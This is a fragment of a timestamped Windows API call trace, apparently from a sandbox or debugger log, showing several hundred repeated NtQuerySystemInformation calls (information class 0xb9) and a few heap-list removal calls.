NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.299] RtlpHeapRemoveListEntry () [0241.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.306] RtlpHeapRemoveListEntry () [0241.309] RtlpHeapRemoveListEntry () [0241.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.331] RtlpHeapRemoveListEntry () [0241.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.340] RtlpHeapRemoveListEntry () [0241.342] RtlpHeapRemoveListEntry () [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.357] 